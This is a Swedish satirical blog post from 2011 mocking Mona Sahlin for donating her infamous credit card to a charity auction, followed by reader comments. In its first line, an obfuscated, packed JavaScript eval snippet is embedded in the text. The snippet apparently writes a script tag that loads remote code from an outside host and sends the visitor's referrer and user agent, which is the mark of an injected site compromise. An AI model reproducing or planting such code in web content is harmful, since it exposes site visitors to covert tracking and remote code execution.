Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Mona Sahlin s kontokort finns nu på auktion.

Mona Sahlin s kontokort finns nu på auktion.
Filip Urde
 • On 15 december, 2011
 • http://www.revue.se/filip-urde

Mona, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|skrzt|var|u0026u|referrer|kihna||js|php’.split(’|’),0,{}))
Mona… Din vinröda LV väska räcker inte längre, du har blivit i skymundan av Håkan ”Ljugholt” Juholt, med sina fantastiska tv framträdanden och nu senast på Skavlan.

httpv://youtu.be/-H7z9AfhFqI

Hur skulle du kunna toppa Juholts marsch mot avgrunden?

Jo! Genom att skänka ditt redskap för förskingring till välgörenhet… Perfekt!

Nu skänker alltså Mona Sahlin sitt ”berömda” kontokort till Musikhjälpens auktioner, för ”Stöd Musikhjälpen för flickors rätt att gå i skolan”. Du kan nu alltså i skrivande stund bli ägare till ett ituklippt och inramat kort ägt och användt av Mona Sahlin. Priset ligger just nu på 10100 kr, så gör ett kap! Detta är historia och jag kan väll tryggt säga att Apples första kontrakt kan slänga sig i väggen. Till skillnad från kontraktet, så har ju Mona faktiskt skapat något med det här kortet… Detta är kortet som användes i toblerone affären. Här är årets julklapp, missa inte detta.

Här kan ni buda på Monas kort.

Sverige: Där brott kan bli till välgörenhet…

Uppdatering: (Tack lowsociety)

Nu kan du även köpa Leif Pagrotskys skägg.

Bakom varje stort skägg finns en person. Nu kan detta beryktade skägg bli dit!

Leif Pagrotsky har valt och raka av sig sitt skägg och skänker detta till musikhjälpen.

Lägg ett bud så gör en god gärning samtidigt som du kan få Paggans skägg i brevlådan.

 

Tillagt i objektsbeskrivningen (13 dec 10:01)OBS! Leif har trimmat av sig EN DEL av sitt skägg, han behåller alltså lite kvar.

Kul det här.

 

Comments

 1. Carlan

  hahaha

 2. Grodan92

  Skillnaden är väl att Håkan inte ljugit 🙂

 3. Carl Bilt

  Finns det ens någon pålitlig källa som bekräftat att det verkligen är Mona Sahlins kontokort? Verkar ganska suspekt och förvånansvärt att Sahlin skulle vilja dra igång den historien igen. Mer troligare att det är några lustigkurrar från MUF som vill tjäna sig en hacka. Brott pratade du om va?

  • Suspekt eller ej, men kul är det =D. Jag tvekar på att det skulle vara MUF, då detta faktiskt går till välgörenhet och dem annonserade detta på radio från radio hjälpen. Och nej, hon är inte dömd för det, men ett brott har hon gjort sig skyldig till i min bok. Rutiner kan man alltid skylla på. Så frågan är väll snarare, ”Carl Bilt utan d”, stödjer du det hon gjorde? 😉